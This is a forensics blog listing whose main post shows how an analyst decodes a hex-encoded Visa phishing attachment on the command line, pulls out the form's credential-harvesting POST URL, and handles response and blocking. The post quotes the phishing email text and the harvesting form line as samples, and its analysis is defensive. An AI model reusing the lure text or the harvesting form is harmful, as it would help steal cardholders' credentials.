Forensics

Automated Phishing Analysis

Posted on Updated on

I’m  Handler for the day at the Internet Storm Center. Check out my post on how to automate phishing analysis and metrics.

 

 

Linux Memory Dump with Rekall

Posted on

Over at isc.sans.org I’m handler of the day! My latest post discusses dumping Linux memory. Please stop by and read the post.

Stop,Drop and File Carve

Posted on Updated on

My lastest post on the storm center covers foremost and how to recover files off a corrupet drive.

Converting Hex encoded Javascript to Ascii via Commandline

Posted on

We all get phishing emails quite often now a days. Therefore, I wanted to post a quick way to deobfuscate hex encoded javascript. Their are many ways to do this, but I wanted a quick way via command line.

My goal, when preforming analysis on phishing emails, is to get the URL out of the code, report it, and block it.

Typical Phishing Email.

Dear Customer,

For security reasons, your card was blocked.

Following an abnormal activity, we saw that someone used the card without

your permission, so to protect you, we blocked the card.

Once you have reactivated your Visa Card records, your card service will

not be interrupted and will continue as normal.

To reactivate your Visa Card download and complete the form attached to

this message.

Note: Failure to verify your records will result in card suspension.

Thank you.

Visa will periodically send you information about site changes and

enhancements.

© Copyright 2001-2011 Visa. All Rights Reserved

File attached to email

Converting

In this case, the file was an html attachment to the email. I saved the file and opened it in a text editor. If I had to follow a link to a phishing site, I would have downloaded the page using TOR and wget script..

The javascript below is simply hex encoded.

script language="javascript"
document.write( unescape( '%09%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%3C%74%69%74%6C%65%3E%56%65%72%69%66%69%65%64%20%62%79%20%56%69%73%61%3C%2F%74%69%74%6C%65%3E%0A%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%0A%20%20%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%63%73%73%2F%6E%75%65%76%6F%63%73%73%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%0A

To convert it to ascii, remove everything up to the first single quote. The start of the file should begin with the %.  I did this using the linux cut command and saved the file as complete-document.htm

#cat html.txt |cut -d ” ‘ ” -f2  >complete-document.htm

%09%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%3C%74%69%74%6C%65%3E%56%65%72%69%66%69%65%64%20%62%79%20%56%69%73%61%3C%2F%74%69%74%6C%65%3E%0A%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%0A%20%20%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%63%73%73%2F%6E%75%65%76%6F%63%73%73%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%0A

Now that we have just the hex encoded part of the html, we are going to use a bash tool xdd to convert it.
#cat complete-document.htm |xxd -r -p |less

	Verified by Visa.. (truncated)...

That is it as far as decoding the file, but that is just the start of your Incident response process.

Analysis

Within the decode, you should see either additional links for the victim to follow, or a web form that uses a POST to a website. In this case, you can grep for the words post and get to find out where this data is going.

#cat complete-document.htm |cut -d “‘” -f2 |xxd -r -p |egrep -i ‘post|get’

form name="run.php" action="http://compromised-host.com/imicommerce/images/music/sample/.m/q.php" method="POST" onSubmit="return OnMultiSubmitHandler(optinLang)

Now that you have the URL, you will need to determine if any systems on your network sent information to the website. You should check logs from your:DNS Servers,Firewall, Network Flows, Web Proxy servers and any other network intelligence for connectivity to determine if any users accessed the site.

Remediation

  • Any system that accessed the site my possibly have malware on it.
  • If the phish is targeting credentials, the user account should be locked and force to reset passwords.
  • If the user entered banking information they will need to notify the bank ASAP.

Report the site as compromised to the whois information contact, the security contact of the organization the phishing email is targeting and add it to phishtank.

Prevention

If you have a dns blacklist server  or  web proxy add the domain to the block list. Be careful if this site is part of a larger site as you will be blocking access to the entire domain.

Creating a log2timeline plugin

Posted on Updated on

I have a new post on the SANS forensics blog.  This post covers the process of creating a plugin for the log2timeline tool. Using a step-by-step instruction, I break down each section of the code and how it works. This should be used as a template for creating any plugin, but I cover how to parse an OS X plist.

OSX Lion Window Preservation

Posted on Updated on

My first post on the SANS forensics blog is up!  The post covers a new feature in OSX 10.7 (Lion).  Lion saves the location of the windows and other data when the application closes. This additional data can be used to supplient your analysis. Mac is continuing to gain market share and we need to start taking a deeper look into this OS to get the most out of our investigations.

For more information about Mac incident response check out my previous post.